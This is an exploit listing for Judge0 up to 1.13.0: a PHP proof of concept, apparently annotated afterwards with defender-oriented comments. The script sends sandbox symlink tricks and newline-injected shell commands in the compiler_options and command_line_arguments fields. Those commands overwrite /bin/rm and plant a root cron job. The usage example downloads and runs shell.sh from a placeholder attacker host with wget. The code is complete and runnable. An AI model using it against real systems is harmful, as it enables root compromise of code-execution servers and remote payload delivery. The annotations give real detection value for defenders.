## https://sploitus.com/exploit?id=PACKETSTORM:189469
=============================================================================================================================================
    | # Title     : Judge0 v 1.13.0 PHP Code Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/judge0/                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
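    [+] The code is an exploit written in PHP that targets a vulnerability in Judge0,

        which allows arbitrary commands to be executed on the target system by exploiting symlinks inside the sandbox environment.

        Note: PHP is only the language of this PoC; the flaw is in Judge0's sandbox handling, not a PHP code-injection bug. The script's own version check treats Judge0 releases up to and including 1.13.0 as affected.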
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 
    
    [+] SeT target  = Line : 111 + 114 (line numbers of the original, unannotated poc.php)
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Proof-of-concept client for the Judge0 HTTP API, annotated for defensive review.
     *
     * The class talks to three API paths (/version, /languages, /submissions) and
     * submits two jobs whose fields carry shell commands; the second job attempts
     * to leave a root cron entry on the worker.
     *
     * What a defender can take from the code below:
     *  - Request pattern: GET /version, GET /languages, one GET /languages/{id} per
     *    language, then two POST /submissions?wait=true in quick succession.
     *  - Request content: `compiler_options` and `command_line_arguments` values
     *    that contain embedded newline characters followed by shell commands.
     *  - Host artefacts: a file under /etc/cron.d/ named with 8 hex characters,
     *    and /bin/rm overwritten with a copy of /usr/bin/unlink.
     *  - The script's version check treats releases <= 1.13.0 as affected; consult
     *    the vendor's advisories for the fixed release and upgrade.
     */
    class Judge0Exploit
    {
        // Base URL of the Judge0 API, stored without a trailing slash.
        private $target;
        // Id of a language whose name contains "Bash"; unset until
        // compile_language_ids() finds one (the last match wins).
        private $bash_id;
        // Language entries (from /languages) whose detail record has a
        // `compile_cmd` and is not archived.
        private $languages = [];
    
        /**
         * @param string $target Base URL of the Judge0 instance; trailing slashes are stripped.
         */
        public function __construct($target)
        {
            $this->target = rtrim($target, '/');
        }
    
        /**
         * Sends one HTTP request to the API and returns the JSON-decoded body.
         *
         * No authentication header is set: the only header ever sent is
         * Content-Type. The PoC therefore presumably depends on the instance
         * accepting anonymous API calls (confirm against your deployment), which
         * makes API access control a relevant mitigating layer.
         *
         * @param string     $endpoint Path appended verbatim to the base URL.
         * @param string     $method   HTTP method passed to cURL as a custom request.
         * @param array|null $data     When truthy, JSON-encoded and sent as the request body.
         * @return mixed Result of json_decode(..., true); the cURL result is not
         *               checked first, so a failed transfer and an undecodable body
         *               are not distinguished by callers, which only test truthiness.
         */
        private function send_request($endpoint, $method = 'GET', $data = null)
        {
            $url = "{$this->target}{$endpoint}";
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
                curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return json_decode($response, true);
        }
    
        /**
         * Enumerates the instance's languages and records the ones that have a compile step.
         *
         * Issues GET /languages followed by one GET /languages/{id} per entry, so
         * a single run shows up in access logs as a burst of sequential language
         * look-ups from one client.
         *
         * Matches are appended to $this->languages on every call; the list is
         * never reset, so calling this twice stores each entry twice.
         *
         * @return bool False when /languages yields nothing usable or no
         *              compiled, non-archived language was found; true otherwise.
         */
        private function compile_language_ids()
        {
            $languages = $this->send_request('/languages');
    
            if (!$languages) {
                return false;
            }
    
            foreach ($languages as $language) {
                // Remember the Bash language id for the first submission in exploit().
                if (strpos($language['name'], 'Bash') !== false) {
                    $this->bash_id = $language['id'];
                }
    
                // Keep only languages that expose a compile command and are still active.
                $lang_info = $this->send_request("/languages/{$language['id']}");
                if ($lang_info && isset($lang_info['compile_cmd']) && !$lang_info['is_archived']) {
                    $this->languages[] = $language;
                }
            }
    
            return !empty($this->languages);
        }
    
        /**
         * Banner-based check: compares the /version response with '1.13.0'.
         *
         * This is a heuristic only. "Safe" means the reported version compared
         * greater than 1.13.0, and "Unknown" means a request returned nothing
         * usable; neither result is evidence that a host is patched.
         *
         * @return string "Appears", "Unknown" or "Safe".
         */
        public function check_vulnerability()
        {
            $res = $this->send_request('/version');
    
            if (!$res) {
                return "Unknown";
            }
    
            // assumes the decoded /version body is a plain version string — TODO confirm
            $version = $res;
            if (version_compare($version, '1.13.0', '<=')) {
                echo "Vulnerable version detected: $version\n";
                return $this->compile_language_ids() ? "Appears" : "Unknown";
            }
    
            return "Safe";
        }
    
        /**
         * Submits the two jobs described in the class comment.
         *
         * The return values of both submissions are discarded and the final
         * message is printed unconditionally, so the script's output says nothing
         * about whether anything happened on the worker.
         *
         * @param string $cmd Command placed, unescaped, into the root cron entry
         *                    built by cron_file().
         * @return void Terminates the script via die() if no compiled language is found.
         */
        public function exploit($cmd)
        {
            if (!$this->compile_language_ids()) {
                die("Failed to get compile language ids\n");
            }
    
            // First submission: a Bash job that renames the sandbox's `run` file
            // and replaces it with a symlink. Falls back to language id 46 when
            // no language named "Bash" was seen.
            $this->send_request('/submissions?wait=true', 'POST', [
                'source_code' => 'mv run runbak; ln -s /bin/rm run',
                'language_id' => $this->bash_id ?? 46
            ]);
    
            // Cron file name is 4 random bytes hex-encoded, i.e. 8 hex characters
            // under /etc/cron.d/ — a usable file-integrity-monitoring indicator.
            $cron_path = "/etc/cron.d/" . bin2hex(random_bytes(4));
            echo "Writing cron job to $cron_path\n";
    
            // Picks a random compiled language. The Rust/73 fallback cannot be
            // reached here: the guard at the top already exits on an empty list.
            $language = !empty($this->languages) ? $this->languages[array_rand($this->languages)] : ['id' => 73, 'name' => 'Rust'];
            echo "Using language: {$language['id']}, {$language['name']}\n";
    
            // Second submission: both `compiler_options` and
            // `command_line_arguments` carry newline-separated shell commands.
            // Newlines in either field are the clearest request-side indicator
            // and something an API gateway or WAF rule can reject outright.
            $this->send_request('/submissions?wait=true', 'POST', [
                'source_code' => "#test " . bin2hex(random_bytes(5)),
                'language_id' => $language['id'],
                'compiler_options' => "--version\nln -s /bin/rm ./run\n#",
                'command_line_arguments' => "x\n" .
                    "cp /bin/rm {$cron_path}\n" .
                    "cp /usr/bin/unlink /bin/rm\n" .
                    "sed -i 's/.*/#/g' {$cron_path}\n" .
                    "sed -i \"2i {$this->cron_file($cmd)}\" {$cron_path}\n" .
                    "echo 'ok'\n"
            ]);
    
            echo "Exploit executed. Check cron jobs for execution.\n";
        }
    
        /**
         * Builds the text of the cron.d entry: a SHELL line, a PATH line and an
         * every-minute job that runs $command as root.
         *
         * @param string $command Inserted verbatim after the `root` user field.
         * @return string Three newline-terminated lines.
         */
        private function cron_file($command)
        {
            return "SHELL=/bin/sh\n" .
                "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\n" .
                "* * * * * root $command\n";
        }
    }
    
    // Usage example
    // "target-ip" and "attacker.com" are placeholders left by the author.
    // Defender view of this flow: the command handed to exploit() would make
    // the worker fetch a script with wget, write it to /tmp/shell.sh, mark it
    // executable and run it. Outbound HTTP from a Judge0 worker to an unknown
    // host and a new executable in /tmp are therefore the follow-on signals.
    $exploit = new Judge0Exploit("http://target-ip:2358");
    $vuln_status = $exploit->check_vulnerability();
    if ($vuln_status === "Appears") {
        $exploit->exploit("wget http://attacker.com/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh");
    } else {
        // Also reached when the check returned "Unknown", so this message is
        // not evidence that the instance is patched.
        echo "Target is not vulnerable.\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================